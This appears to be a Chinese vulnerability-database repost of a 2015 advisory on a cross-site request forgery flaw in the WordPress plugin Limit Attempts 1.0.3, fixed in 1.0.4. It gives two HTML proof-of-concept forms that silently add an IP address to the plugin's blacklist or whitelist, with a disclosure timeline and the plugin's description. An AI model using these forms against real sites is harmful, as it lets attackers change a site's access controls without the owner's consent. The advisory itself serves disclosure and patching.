WordPress Limit Attempts 1.0.3 Cross Site Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040698 漏洞类型
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120203
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Plugin Name : WP Limit Attempts A8-Cross-Site_Request_Forgery_(CSRF)
 
Effected Version : 1.0.3 (and most probably lower version's if any)
 
Vulnerability : A8-Cross-Site Request Forgery (CSRF)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Unauthenticated
 
PoC - (Proof of Concept) :
 
POC for Blcklist :
 
<html>
<body>
<form action=?http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=blacklist? method=?POST?>
<input type=?hidden? name=?lmtttmpts_add_to_blacklist? value=?192.168.1.1? />
<input type=?submit? value=?Submit request? />
</form>
</body>
</html>
 
POC for whitelist:
 
<html>
<body>
<form action=?http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=whitelist? method=?POST?>
<input type=?hidden? name=?lmtttmpts_add_to_whitelist? value=?192.168.1.1? />
<input type=?submit? value=?Submit request? />
</form>
</body>
</html>
 
In the value place change the IP which you want to block (or) allow
 
 
Vulnerable Parameter : Vulnerable_parameter
 
Fixed in : 1.0.4
 
http://wordpress.org/plugins/limit-attempts/changelog/
 
Disclosure Timeline
 
Vendor Contacted : 2014-08-04
 
Plugin Status : Updated on 2014-08-07
 
Public Disclosure : October 3, 2015
 
CVE Number : Not assigned yet
 
Plugin Description :
 
Limit Attempts is a plugin developed by BestWebSoft, which was designed to manage the access to user's website. With this plugin, you can limit user's attempts to log in to your website and, consequently, block the user for a certain period of time. Apart from that, Limit Attempts allows users to create and edit black- and whitelists with the aim of controlling the access to the site and its content. Also, with this plugin, users will be able to specify the settings for adding an address to the blacklist, as well as be aware of everything that is going on your website by sending email notifications about blocking. Moreover, this plugin is compatible with htaccess, thus, you can minimize server workload by adding IP address blocking data to htaccess file.